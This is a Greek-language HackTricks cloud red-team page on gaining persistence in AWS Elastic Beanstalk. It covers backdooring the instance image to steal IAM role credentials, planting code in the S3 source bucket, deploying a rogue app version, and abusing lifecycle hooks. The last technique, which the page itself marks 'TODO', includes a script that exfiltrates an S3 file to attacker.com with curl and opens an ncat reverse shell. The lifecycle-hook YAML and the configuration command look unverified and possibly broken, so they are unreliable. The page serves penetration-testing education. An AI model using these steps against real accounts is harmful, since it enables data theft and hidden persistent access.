AWS - Elastic Beanstalk Persistence

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Elastic Beanstalk

Για περισσότερες πληροφορίες, ελέγξτε:

pageAWS - Elastic Beanstalk Enum

Μόνιμη Αποθήκευση στην Εικόνα

Προκειμένου να διατηρηθεί η μόνιμη αποθήκευση μέσα στον λογαριασμό AWS, μπορεί να εισαχθεί ένας μηχανισμός μόνιμης αποθήκευσης μέσα στην εικόνα (cron job, ssh key...) έτσι ώστε ο επιτιθέμενος να μπορεί να έχει πρόσβαση και να κλέψει διαπιστευτήρια ρόλου IAM από την υπηρεσία μεταδεδομένων.

Παρασιτικός κώδικας στην Έκδοση

Ένας επιτιθέμενος μπορεί να εισάγει παρασιτικό κώδικα μέσα στο αποθετήριο S3 έτσι ώστε να εκτελεί πάντα τον παρασιτικό κώδικα και όχι τον αναμενόμενο κώδικα.

Νέα παρασιτική έκδοση

Αντί να αλλάξει τον κώδικα στην πραγματική έκδοση, ο επιτιθέμενος μπορεί να αναπτύξει μια νέα παρασιτική έκδοση της εφαρμογής.

Κατάχρηση Αγκίστρων Ζωής Προσαρμοσμένου Πόρου

TODO: Ελέγξτε

Το Elastic Beanstalk παρέχει αγκίστρα ζωής που σας επιτρέπουν να εκτελέσετε προσαρμοσμένα scripts κατά τη διάρκεια της παροχής και της τερματισμού των παραδειγμάτων. Ένας επιτιθέμενος μπορεί να διαμορφώσει ένα αγκίστρων ζωής για να εκτελεί περιοδικά ένα script που εξαφανίζει δεδομένα ή διατηρεί πρόσβαση στον λογαριασμό AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated